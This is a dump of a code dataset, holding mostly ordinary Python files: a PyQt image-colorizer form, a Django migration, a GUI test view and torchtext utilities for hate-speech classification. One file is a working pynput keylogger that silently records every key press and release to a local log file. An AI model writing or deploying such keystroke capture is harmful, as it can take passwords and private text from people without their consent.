Dataset schema (one column per field; "nullable" marks columns that contain null values):

repo_name: string (lengths 7..111)
__id__: int64 (16.6k..19,705B)
blob_id: string (length 40)
directory_id: string (length 40)
path: string (lengths 5..151)
content_id: string (length 40)
detected_licenses: list
license_type: string (2 classes)
repo_url: string (lengths 26..130)
snapshot_id: string (length 40)
revision_id: string (length 40)
branch_name: string (lengths 4..42)
visit_date: timestamp[ns]
revision_date: timestamp[ns]
committer_date: timestamp[ns]
github_id: int64 (14.6k..687M, nullable)
star_events_count: int64 (0..209k)
fork_events_count: int64 (0..110k)
gha_license_id: string (12 classes)
gha_fork: bool (2 classes)
gha_event_created_at: timestamp[ns]
gha_created_at: timestamp[ns]
gha_updated_at: timestamp[ns]
gha_pushed_at: timestamp[ns]
gha_size: int64 (0..10.2M, nullable)
gha_stargazers_count: int32 (0..178k, nullable)
gha_forks_count: int32 (0..88.9k, nullable)
gha_open_issues_count: int32 (0..2.72k, nullable)
gha_language: string (lengths 1..16, nullable)
gha_archived: bool (1 class)
gha_disabled: bool (1 class)
content: string (lengths 10..2.95M)
src_encoding: string (5 classes)
language: string (1 class)
is_vendor: bool (2 classes)
is_generated: bool (2 classes)
length_bytes: int64 (10..2.95M)
extension: string (19 classes)
num_repo_files: int64 (1..202k)
filename: string (lengths 4..112)
num_lang_files: int64 (1..202k)
alphanum_fraction: float64 (0.26..0.89)
alpha_fraction: float64 (0.2..0.89)
hex_fraction: float64 (0..0.09)
num_lines: int32 (1..93.6k)
avg_line_length: float64 (4.57..103)
max_line_length: int64 (7..931)
iosetek/CommandRecognition | 16,552,803,984,647 | b6a635c3cdbf64a5d8535ede2292b8403ea39149 | 8e79d1a368e99b1cb44d232703839fe2542c21d8 | /src/gui/test.py | 899f4e628b88ee8b789b28ca8a498a20b4362fd0 | ["MIT"]
| permissive | https://github.com/iosetek/CommandRecognition | ab233063fd1ccf2e81d96d5ccd1cb1a30ea8f236 | 56a58b44bdc4d54feafc955c17dd0ff236486cae | refs/heads/master | 2020-05-01T12:09:22.236993 | 2019-09-03T00:26:34 | 2019-09-03T00:26:34 | 177,459,249 | 0 | 0 | MIT | false | 2019-08-07T23:18:41 | 2019-03-24T19:26:55 | 2019-05-02T12:05:20 | 2019-08-07T23:18:41 | 396 | 0 | 0 | 0 | Python | false | false |
from src.api import Api
from src.gui.appJar.appjar import gui
class TestUI:
def __init__(self, app):
self.__app = app
self.__isRecording = False
self.__RECORD_BUTTON_NAME = "TEST_START_STOP_RECORD_BUTTON"
self.__USE_ACTION_CHECKBOX_NAME = "TEST_USE_ACTION_CHECKBOX"
def append_its_content(self):
"""
Creates view designed for testing command recognition
ability of current application. It allows user to record
it's own voice and informs if any command was detected.
It can be also used to check if action for current command
works properly.
"""
self.__add_recording_button()
self.__app.addNamedCheckBox("USE \nACTION", self.__USE_ACTION_CHECKBOX_NAME)
print("TODO")
def __add_recording_button(self):
self.__app.addImageButton(
self.__RECORD_BUTTON_NAME,
self.__record_button_pressed,
"src/gui/gfx/button_record_start.gif")
def __record_button_pressed(self):
if self.__isRecording:
self.__isRecording = False
self.__app.setButtonImage(self.__RECORD_BUTTON_NAME, "src/gui/gfx/button_record_start.gif")
Api.stop_recording()
else:
self.__isRecording = True
self.__app.setButtonImage(self.__RECORD_BUTTON_NAME, "src/gui/gfx/button_record_stop.gif")
Api.start_recording()
| UTF-8 | Python | false | false | 1,447 | py | 43 | test.py | 37 | 0.609537 | 0.609537 | 0 | 37 | 37.891892 | 103 |
artidoro/hate-speech-detection | 3,461,743,676,683 | 26405347bf9849605897b78d21737a55f3eae0a2 | 9295f1f774e63dff47951c52a5a60ef8dab07239 | /hate_speach_utils.py | 399a953fe1d8c4fa27ce9cba23f25070f715e7d4 | []
| no_license | https://github.com/artidoro/hate-speech-detection | a718fdb1ca4c81520aa1d5161b459569d793461d | 78923e3fc2243b6d77be56d98a95a262797e2bd5 | refs/heads/master | 2021-02-14T02:44:58.017139 | 2020-03-06T03:39:41 | 2020-03-06T03:39:41 | 244,759,525 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import torch
import torchtext
from torchtext import data
from torchtext.vocab import Vectors, GloVe
import os
from tqdm import tqdm
from datetime import datetime
import logging
import pprint
import io
from transformers import RobertaTokenizer
from tokenizers import CharBPETokenizer
import numpy as np
from sklearn.metrics import f1_score, confusion_matrix
def get_average_embedding(vector_map):
"""
    Compute the average embedding from the dictionary of embeddings.
"""
embeds = torch.cat(list(map(lambda x: x.view(1, -1), vector_map.values())), 0)
return torch.mean(embeds, 0)
def load_vectors(fname, train_vocab, device):
"""
Modified from https://fasttext.cc/docs/en/english-vectors.html.
This loads fasttext vectors for words that have been encountered in the
vocabulary `train_vocab`.
    We also build a string-to-integer map to look up the integer index of each word.
"""
fin = io.open(fname, 'r', encoding='utf-8', newline='\n', errors='ignore')
n, d = map(int, fin.readline().split())
data = {}
stoi = {}
loaded_vectors = 0
words = {word.lower().strip() for word in train_vocab.freqs}
for idx, line in tqdm(enumerate(fin)):
tokens = line.rstrip().split(' ')
if tokens[0] in words:
stoi[tokens[0]] = idx
data[idx] = torch.tensor(list(map(float, tokens[1:])), device=device)
loaded_vectors += 1
logger = logging.getLogger('logger')
logger.info('Number of vectors loaded from fasttext {}'.format(loaded_vectors))
return data, stoi
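# For reference, the .vec text format parsed above follows the fastText
# convention: a "<num_words> <dim>" header line, then one line per word of
# the form "<word> <v1> ... <v_dim>"; only words already present in the
# training vocabulary are kept.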
def torchtext_iterators(args):
"""
Builds torchtext iterators from the files.
"""
logger = logging.getLogger('logger')
logger.info('Starting to load data and create iterators.')
# Tokenizer.
if args['model_name'] == 'roberta':
tokenizer = lambda x : [x]
elif args['subword']:
tokenizer = 'subword'
elif args['bpe']:
bpe_tokenizer = CharBPETokenizer('log/bpe-trained-vocab.json', 'log/bpe-trained-merges.txt')
tokenizer = lambda x : bpe_tokenizer.encode(x).tokens
else:
tokenizer = None
# `sequential` does not tokenize the label.
label = data.Field(batch_first=True, sequential=False)
text = data.Field(batch_first=True, lower=True, tokenize=tokenizer)
fields = [('text', text), ('label', label)]
train = data.TabularDataset(args['train_path'], 'tsv', fields, skip_header=True)
valid = data.TabularDataset(args['valid_path'], 'tsv', fields, skip_header=True)
test = data.TabularDataset(args['test_path'], 'tsv', [('text', text)], skip_header=True)
text.build_vocab(train, min_freq=args['min_freq'])
label.build_vocab(train)
train_iter, valid_iter, test_iter = torchtext.data.BucketIterator.splits(
(train, valid, test), batch_size=args['batch_size'], repeat=False,
device=torch.device(args['device']), sort=False,
sort_within_batch=False)
if not args['no_pretrained_vectors']:
if not args['load_vectors_manually']:
logger.info('Starting to load vectors from Glove.')
text.vocab.load_vectors(vectors=GloVe(name='6B'))
else:
logger.info('Starting to manually load vectors from FastText.')
vector_map, stoi = load_vectors(args['fasttext_path'], text.vocab, torch.device(args['device']))
average_embed = get_average_embedding(vector_map)
text.vocab.set_vectors(stoi, vector_map, 300, unk_init=lambda x: average_embed.clone())
text.vocab.vectors[text.vocab.stoi['<unk>']] = average_embed.clone()
logger.info('Built train vocabulary of {} words'.format(len(text.vocab)))
return train_iter, valid_iter, test_iter, text, label
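# The `args` mapping consumed above would look like this (hypothetical
# values; only the keys actually read by torchtext_iterators are shown):
#   args = {'model_name': 'lstm', 'subword': False, 'bpe': False,
#           'train_path': 'data/train.tsv', 'valid_path': 'data/valid.tsv',
#           'test_path': 'data/test.tsv', 'min_freq': 2, 'batch_size': 32,
#           'device': 'cpu', 'no_pretrained_vectors': True,
#           'load_vectors_manually': False, 'fasttext_path': 'wiki.en.vec'}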
def predict_write_to_file(module, val_iter, args):
mode = module.training
module.eval()
predictions = []
for batch in tqdm(val_iter):
scores = module.forward(batch.text)
preds = scores.argmax(1).squeeze()
predictions += list(preds.cpu().numpy())
# Write predictions to file.
with open(os.path.join('log', args['checkpoint_path'], 'test_results.txt'), 'w') as out_file:
for pred in predictions:
out_file.write(args['LABEL'].vocab.itos[pred] + '\n')
module.train(mode)
| UTF-8 | Python | false | false | 4,288 | py | 4 | hate_speach_utils.py | 2 | 0.654151 | 0.65042 | 0 | 110 | 37.981818 | 108 |
prabhatmalhan/Computer_Tools | 2,972,117,403,603 | 8e33750c6d7530b05c467fe2a90e78af7b936e01 | e466198ac69dd031428fd0018f4b7f729da28e17 | /Keylogger/keylogger.py | 05f387b127f47915a0f4e96ad3ec90fcf6e7111 | ["Unlicense"]
| permissive | https://github.com/prabhatmalhan/Computer_Tools | 93cf6e241796ba138dd200a8eb6cbb98a65adfad | 4ec90381ff23684f602a6b92cecd2c25cfcc43cb | refs/heads/master | 2023-01-05T02:40:16.941234 | 2020-11-05T03:13:15 | 2020-11-05T03:13:15 | 268,194,610 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import sys
try:
    from os import system as syst
except ImportError:
    sys.exit()
try:
    from pynput.keyboard import Key, Listener
except ImportError:
    # pynput is missing: try to install it, then import again
    syst('pip install pynput')
    syst('cls')
    try:
        from pynput.keyboard import Key, Listener
    except ImportError:
        sys.exit()
import logging
logging.basicConfig(filename='keystroke' , level = logging.DEBUG , format = '%(asctime)s : %(message)s')
def on_press(key) :
logging.info('\t'+str(key))
def on_release(key) :
logging.info('\t'*4+str(key))
if key == Key.esc :
return False
with Listener(on_press=on_press,on_release=on_release) as listener :
listener.join()
| UTF-8 | Python | false | false | 677 | py | 4 | keylogger.py | 3 | 0.695716 | 0.694239 | 0 | 37 | 17.297297 | 104 |
PreFX48/colorization_project | 12,506,944,804,027 | a6a504b3832079542ba482f8c1b29aa1fff7ff70 | d3fa08a938f0ad4375875412f2a3706205f05067 | /colorize/form.py | 442e5a4283fe0e93f50556827397bcca7e16077f | []
| no_license | https://github.com/PreFX48/colorization_project | 6848656999d2d52d7c3d506933702146744a5ae3 | 138aa3cbaf3f4b59e8fcdae36570f0cc5c67056a | refs/heads/main | 2023-04-01T23:31:04.904012 | 2021-03-20T14:43:32 | 2021-03-20T14:43:32 | 349,738,450 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'form.ui'
#
# Created by: PyQt5 UI code generator 5.15.3
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(1200, 800)
self.horizontalLayoutWidget = QtWidgets.QWidget(MainWindow)
self.horizontalLayoutWidget.setObjectName("horizontalLayoutWidget")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget)
self.horizontalLayout.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)
self.horizontalLayout.setContentsMargins(0, 10, 10, 5)
self.horizontalLayout.setObjectName("horizontalLayout")
self.verticalLayout = QtWidgets.QVBoxLayout()
self.verticalLayout.setObjectName("verticalLayout")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.label_3 = QtWidgets.QLabel(self.horizontalLayoutWidget)
self.label_3.setObjectName("label_3")
self.horizontalLayout_2.addWidget(self.label_3)
self.raw_folder_input = QtWidgets.QLineEdit(self.horizontalLayoutWidget)
self.raw_folder_input.setText("")
self.raw_folder_input.setObjectName("raw_folder_input")
self.horizontalLayout_2.addWidget(self.raw_folder_input)
self.raw_folder_dialog_button = QtWidgets.QToolButton(self.horizontalLayoutWidget)
self.raw_folder_dialog_button.setObjectName("raw_folder_dialog_button")
self.horizontalLayout_2.addWidget(self.raw_folder_dialog_button)
self.verticalLayout.addLayout(self.horizontalLayout_2)
self.horizontalLayout_8 = QtWidgets.QHBoxLayout()
self.horizontalLayout_8.setObjectName("horizontalLayout_8")
self.prev_image_button = QtWidgets.QPushButton(self.horizontalLayoutWidget)
self.prev_image_button.setObjectName("prev_image_button")
self.horizontalLayout_8.addWidget(self.prev_image_button)
self.current_image_label = QtWidgets.QLabel(self.horizontalLayoutWidget)
self.current_image_label.setAlignment(QtCore.Qt.AlignCenter)
self.current_image_label.setObjectName("current_image_label")
self.horizontalLayout_8.addWidget(self.current_image_label)
self.next_image_button = QtWidgets.QPushButton(self.horizontalLayoutWidget)
self.next_image_button.setObjectName("next_image_button")
self.horizontalLayout_8.addWidget(self.next_image_button)
self.horizontalLayout_8.setStretch(1, 1)
self.verticalLayout.addLayout(self.horizontalLayout_8)
self.verticalLayout_2 = QtWidgets.QVBoxLayout()
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.gridLayout = QtWidgets.QGridLayout()
self.gridLayout.setObjectName("gridLayout")
self.colorpicker_mode_button = QtWidgets.QPushButton(self.horizontalLayoutWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.colorpicker_mode_button.sizePolicy().hasHeightForWidth())
self.colorpicker_mode_button.setSizePolicy(sizePolicy)
self.colorpicker_mode_button.setObjectName("colorpicker_mode_button")
self.gridLayout.addWidget(self.colorpicker_mode_button, 0, 1, 1, 1)
self.pushButton_6 = QtWidgets.QPushButton(self.horizontalLayoutWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.pushButton_6.sizePolicy().hasHeightForWidth())
self.pushButton_6.setSizePolicy(sizePolicy)
self.pushButton_6.setCheckable(False)
self.pushButton_6.setFlat(True)
self.pushButton_6.setObjectName("pushButton_6")
self.gridLayout.addWidget(self.pushButton_6, 0, 2, 1, 1)
self.fill_mode_button = QtWidgets.QPushButton(self.horizontalLayoutWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.fill_mode_button.sizePolicy().hasHeightForWidth())
self.fill_mode_button.setSizePolicy(sizePolicy)
self.fill_mode_button.setObjectName("fill_mode_button")
self.gridLayout.addWidget(self.fill_mode_button, 1, 1, 1, 1)
self.pushButton_5 = QtWidgets.QPushButton(self.horizontalLayoutWidget)
self.pushButton_5.setFlat(True)
self.pushButton_5.setObjectName("pushButton_5")
self.gridLayout.addWidget(self.pushButton_5, 1, 3, 1, 1)
self.pushButton_7 = QtWidgets.QPushButton(self.horizontalLayoutWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.pushButton_7.sizePolicy().hasHeightForWidth())
self.pushButton_7.setSizePolicy(sizePolicy)
self.pushButton_7.setFlat(True)
self.pushButton_7.setObjectName("pushButton_7")
self.gridLayout.addWidget(self.pushButton_7, 1, 2, 1, 1)
self.pushButton_4 = QtWidgets.QPushButton(self.horizontalLayoutWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.pushButton_4.sizePolicy().hasHeightForWidth())
self.pushButton_4.setSizePolicy(sizePolicy)
self.pushButton_4.setFlat(True)
self.pushButton_4.setObjectName("pushButton_4")
self.gridLayout.addWidget(self.pushButton_4, 0, 3, 1, 1)
self.brush_mode_button = QtWidgets.QPushButton(self.horizontalLayoutWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.brush_mode_button.sizePolicy().hasHeightForWidth())
self.brush_mode_button.setSizePolicy(sizePolicy)
self.brush_mode_button.setObjectName("brush_mode_button")
self.gridLayout.addWidget(self.brush_mode_button, 0, 0, 1, 1)
self.eraser_mode_button = QtWidgets.QPushButton(self.horizontalLayoutWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.eraser_mode_button.sizePolicy().hasHeightForWidth())
self.eraser_mode_button.setSizePolicy(sizePolicy)
self.eraser_mode_button.setObjectName("eraser_mode_button")
self.gridLayout.addWidget(self.eraser_mode_button, 1, 0, 1, 1)
self.verticalLayout_2.addLayout(self.gridLayout)
self.verticalLayout.addLayout(self.verticalLayout_2)
self.palette = Palette(self.horizontalLayoutWidget)
self.palette.setMinimumSize(QtCore.QSize(50, 50))
self.palette.setObjectName("palette")
self.verticalLayout.addWidget(self.palette)
self.gridLayout_2 = QtWidgets.QGridLayout()
self.gridLayout_2.setObjectName("gridLayout_2")
self.brush_opacity_input = QtWidgets.QLineEdit(self.horizontalLayoutWidget)
self.brush_opacity_input.setObjectName("brush_opacity_input")
self.gridLayout_2.addWidget(self.brush_opacity_input, 1, 2, 1, 1)
self.brush_size_slider = QtWidgets.QSlider(self.horizontalLayoutWidget)
self.brush_size_slider.setMinimum(1)
self.brush_size_slider.setMaximum(50)
self.brush_size_slider.setProperty("value", 10)
self.brush_size_slider.setOrientation(QtCore.Qt.Horizontal)
self.brush_size_slider.setObjectName("brush_size_slider")
self.gridLayout_2.addWidget(self.brush_size_slider, 0, 1, 1, 1)
self.brush_opacity_slider = QtWidgets.QSlider(self.horizontalLayoutWidget)
self.brush_opacity_slider.setMaximum(100)
self.brush_opacity_slider.setProperty("value", 100)
self.brush_opacity_slider.setOrientation(QtCore.Qt.Horizontal)
self.brush_opacity_slider.setObjectName("brush_opacity_slider")
self.gridLayout_2.addWidget(self.brush_opacity_slider, 1, 1, 1, 1)
self.brush_hardness_input = QtWidgets.QLineEdit(self.horizontalLayoutWidget)
self.brush_hardness_input.setObjectName("brush_hardness_input")
self.gridLayout_2.addWidget(self.brush_hardness_input, 2, 2, 1, 1)
self.label_6 = QtWidgets.QLabel(self.horizontalLayoutWidget)
self.label_6.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_6.setObjectName("label_6")
self.gridLayout_2.addWidget(self.label_6, 2, 0, 1, 1)
self.label_5 = QtWidgets.QLabel(self.horizontalLayoutWidget)
self.label_5.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_5.setObjectName("label_5")
self.gridLayout_2.addWidget(self.label_5, 1, 0, 1, 1)
self.brush_hardness_slider = QtWidgets.QSlider(self.horizontalLayoutWidget)
self.brush_hardness_slider.setMinimum(1)
self.brush_hardness_slider.setMaximum(100)
self.brush_hardness_slider.setProperty("value", 90)
self.brush_hardness_slider.setOrientation(QtCore.Qt.Horizontal)
self.brush_hardness_slider.setObjectName("brush_hardness_slider")
self.gridLayout_2.addWidget(self.brush_hardness_slider, 2, 1, 1, 1)
self.label_4 = QtWidgets.QLabel(self.horizontalLayoutWidget)
self.label_4.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_4.setObjectName("label_4")
self.gridLayout_2.addWidget(self.label_4, 0, 0, 1, 1)
self.brush_size_input = QtWidgets.QLineEdit(self.horizontalLayoutWidget)
self.brush_size_input.setObjectName("brush_size_input")
self.gridLayout_2.addWidget(self.brush_size_input, 0, 2, 1, 1)
self.gridLayout_2.setColumnMinimumWidth(1, 100)
self.gridLayout_2.setColumnStretch(1, 1)
self.verticalLayout.addLayout(self.gridLayout_2)
spacerItem = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.verticalLayout.addItem(spacerItem)
self.horizontalLayout_7 = QtWidgets.QHBoxLayout()
self.horizontalLayout_7.setObjectName("horizontalLayout_7")
self.label_8 = QtWidgets.QLabel(self.horizontalLayoutWidget)
self.label_8.setObjectName("label_8")
self.horizontalLayout_7.addWidget(self.label_8)
self.save_folder_input = QtWidgets.QLineEdit(self.horizontalLayoutWidget)
self.save_folder_input.setText("")
self.save_folder_input.setObjectName("save_folder_input")
self.horizontalLayout_7.addWidget(self.save_folder_input)
self.save_folder_dialog_button = QtWidgets.QToolButton(self.horizontalLayoutWidget)
self.save_folder_dialog_button.setObjectName("save_folder_dialog_button")
self.horizontalLayout_7.addWidget(self.save_folder_dialog_button)
self.verticalLayout.addLayout(self.horizontalLayout_7)
self.save_button = QtWidgets.QPushButton(self.horizontalLayoutWidget)
self.save_button.setFlat(False)
self.save_button.setObjectName("save_button")
self.verticalLayout.addWidget(self.save_button)
self.horizontalLayout.addLayout(self.verticalLayout)
self.raw_image = Canvas(self.horizontalLayoutWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(1)
sizePolicy.setVerticalStretch(1)
sizePolicy.setHeightForWidth(self.raw_image.sizePolicy().hasHeightForWidth())
self.raw_image.setSizePolicy(sizePolicy)
self.raw_image.setMinimumSize(QtCore.QSize(100, 100))
self.raw_image.setAlignment(QtCore.Qt.AlignCenter)
self.raw_image.setObjectName("raw_image")
self.horizontalLayout.addWidget(self.raw_image)
self.verticalLayout_3 = QtWidgets.QVBoxLayout()
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.colorize_button = QtWidgets.QPushButton(self.horizontalLayoutWidget)
self.colorize_button.setObjectName("colorize_button")
self.verticalLayout_3.addWidget(self.colorize_button)
self.horizontalLayout.addLayout(self.verticalLayout_3)
self.colorized_image = Canvas(self.horizontalLayoutWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(1)
sizePolicy.setVerticalStretch(1)
sizePolicy.setHeightForWidth(self.colorized_image.sizePolicy().hasHeightForWidth())
self.colorized_image.setSizePolicy(sizePolicy)
self.colorized_image.setMinimumSize(QtCore.QSize(100, 100))
self.colorized_image.setAlignment(QtCore.Qt.AlignCenter)
self.colorized_image.setObjectName("colorized_image")
self.horizontalLayout.addWidget(self.colorized_image)
self.horizontalLayout.setStretch(0, 5)
self.horizontalLayout.setStretch(1, 7)
self.horizontalLayout.setStretch(3, 7)
MainWindow.setCentralWidget(self.horizontalLayoutWidget)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.label_3.setText(_translate("MainWindow", "Folder"))
self.raw_folder_dialog_button.setText(_translate("MainWindow", "..."))
self.prev_image_button.setText(_translate("MainWindow", "<"))
self.current_image_label.setText(_translate("MainWindow", "image_sample.png"))
self.next_image_button.setText(_translate("MainWindow", ">"))
self.colorpicker_mode_button.setText(_translate("MainWindow", "CP"))
self.pushButton_6.setText(_translate("MainWindow", "C"))
self.fill_mode_button.setText(_translate("MainWindow", "Fill"))
self.pushButton_5.setText(_translate("MainWindow", "H"))
self.pushButton_7.setText(_translate("MainWindow", "G"))
self.pushButton_4.setText(_translate("MainWindow", "D"))
self.brush_mode_button.setText(_translate("MainWindow", "Br"))
self.eraser_mode_button.setText(_translate("MainWindow", "Eras"))
self.brush_opacity_input.setText(_translate("MainWindow", "100"))
self.brush_hardness_input.setText(_translate("MainWindow", "90"))
self.label_6.setText(_translate("MainWindow", "Hardness"))
self.label_5.setText(_translate("MainWindow", "Opacity"))
self.label_4.setText(_translate("MainWindow", "Size"))
self.brush_size_input.setText(_translate("MainWindow", "10"))
self.label_8.setText(_translate("MainWindow", "Folder"))
self.save_folder_dialog_button.setText(_translate("MainWindow", "..."))
self.save_button.setText(_translate("MainWindow", "SAVE"))
self.raw_image.setText(_translate("MainWindow", "raw_image"))
self.colorize_button.setText(_translate("MainWindow", "->"))
self.colorized_image.setText(_translate("MainWindow", "colorized_image"))
from canvas import Canvas
from palette import Palette
| UTF-8 | Python | false | false | 16,033 | py | 19 | form.py | 15 | 0.724755 | 0.707853 | 0 | 256 | 61.628906 | 114 |
liltong97/dsp | 7,413,113,573,585 | 5ef0eaed2c89a28b0810712aa3404fe7eaa3da90 | 15ab89c068c1ec6976c3b188e0fcafd058a30f2e | /python/q5_datetime.py | 18e10ee9cff4c71e4e6b79c639e8e4ce93f5e670 | []
| no_license | https://github.com/liltong97/dsp | 70785fb61e9a2bd7e2caa8a8ed3893076127260e | 9d489412c02c887e3ebe1ab4d17bff7f7836e424 | refs/heads/master | 2021-01-13T15:03:13.378163 | 2017-01-12T21:22:24 | 2017-01-12T21:22:24 | 76,284,152 | 1 | 0 | null | true | 2016-12-12T18:32:32 | 2016-12-12T18:32:32 | 2016-12-09T19:38:34 | 2016-12-05T18:51:00 | 2,681 | 0 | 0 | 0 | null | null | null |
# Hint: use Google to find python function
from datetime import date
####a)
date_start = '01-02-2013'
date_stop = '07-28-2015'
def find_days_dashes(date_start, date_stop):
start_array = map(int, date_start.split('-'))
stop_array = map(int, date_stop.split('-'))
d0 = date(start_array[2], start_array[0], start_array[1])
d1 = date(stop_array[2], stop_array[0], stop_array[1])
delta = d1-d0
return delta.days
print find_days_dashes(date_start, date_stop)
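# prints 937 (2013-01-02 to 2015-07-28; inputs are MM-DD-YYYY)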
####b)
date_start = '12312013'
date_stop = '05282015'
def find_days_nodashes(date_start, date_stop):
d0 = date(int(date_start[4:]), int(date_start[0:2]), int(date_start[2:4]))
d1 = date(int(date_stop[4:]), int(date_stop[0:2]), int(date_stop[2:4]))
delta = d1-d0
return delta.days
print find_days_nodashes(date_start, date_stop)
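# prints 513 (2013-12-31 to 2015-05-28; inputs are MMDDYYYY)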
####c)
date_start = '15-Jan-1994'
date_stop = '14-Jul-2015'
def find_days_words(date_start, date_stop):
start_array = date_start.split('-')
stop_array = date_stop.split('-')
d = {'Jan' : 1, 'Jul': 7}
d0 = date(int(start_array[2]), d[start_array[1]], int(start_array[0]))
d1 = date(int(stop_array[2]), d[stop_array[1]], int(stop_array[0]))
delta = d1-d0
return delta.days
print find_days_words(date_start, date_stop)
| UTF-8 | Python | false | false | 1,270 | py | 12 | q5_datetime.py | 6 | 0.638583 | 0.575591 | 0 | 37 | 33.324324 | 78 |
telminov/ansible-manager | 13,554,916,797,729 | ee5a42c91d6c91a1bbac7a1b482473087a29cb3d | 9ab4af46e9a35519e16d8ea52337e4ca908e3bfa | /core/migrations/0013_auto_20170705_1453.py | e61511423a84f6feef28a4c4b6f213dfc9169f07 | ["MIT"]
| permissive | https://github.com/telminov/ansible-manager | 11a78417afbe9a0b4ee995c00b91e19b71905325 | 05222c469f31ebab3d35dce127c4687bdd8e86e1 | refs/heads/master | 2021-01-22T20:39:59.366634 | 2018-10-30T13:22:01 | 2018-10-30T13:22:01 | 85,341,950 | 13 | 7 | MIT | false | 2020-07-03T08:16:39 | 2017-03-17T18:14:17 | 2020-02-15T03:42:28 | 2018-10-30T13:22:02 | 268 | 12 | 3 | 4 | Python | false | false |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-07-05 11:53
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('core', '0012_auto_20170623_1113'),
]
operations = [
migrations.CreateModel(
name='RepeatSetting',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('pause', models.IntegerField(help_text='Time in minutes')),
('template', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='repeat_settings', to='core.TaskTemplate')),
],
),
migrations.RenameField(
model_name='task',
old_name='is_cron_created',
new_name='is_automatically_created',
),
migrations.AddField(
model_name='task',
name='repeat_number',
field=models.IntegerField(default=0),
),
]
| UTF-8 | Python | false | false | 1,101 | py | 86 | 0013_auto_20170705_1453.py | 57 | 0.584015 | 0.553134 | 0 | 34 | 31.382353 | 149 |
r06922085/chatbot | 15,135,464,760,601 | 2cc780aa9a15aca53f43738f7b03b58378ef4be6 | 33fad982daddff9eea25baabdf2ab2807d7ffe1e | /utils/dataManager.py | 9f2c88184fccc064a2719a282060e3e902ac9b70 | []
| no_license | https://github.com/r06922085/chatbot | 56ee70ee6ee6e8a65d385825cbb6788699bf17bb | b2772c0ae9b0968813bae702cbd902d5e35877d1 | HEAD | 2018-11-06T01:20:12.287195 | 2018-08-27T09:02:19 | 2018-08-27T09:02:19 | 144,441,660 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import numpy as np
import json
import pickle
PAD = '<PAD>' # index 0
BOS = '<BOS>' # index 1
EOS = '<EOS>' # index 2
UNK = '<UNK>' # index 3
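# Illustrative example (not from the original code): with word_list
# ['<PAD>', '<BOS>', '<EOS>', '<UNK>', 'hello', 'world'], the sentence
# ['hello', 'world'] padded to max_len 5 encodes to [4, 5, 2, 0, 0]
# (word indices, then EOS, then PAD), matching BuildTrainableData below.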
class DataManager():
raw_data = None
whole_data = None
train_data = None
train_label = None
clean_train_label = None
#word_list
word_list = [PAD, BOS, EOS, UNK]
word_list_final = [PAD, BOS, EOS, UNK]
dictionary = []
times = [0,0,0,0]
voc_size = 4
max_len = 0
file_name = ''
# data used for training
train_x = []
train_y = []
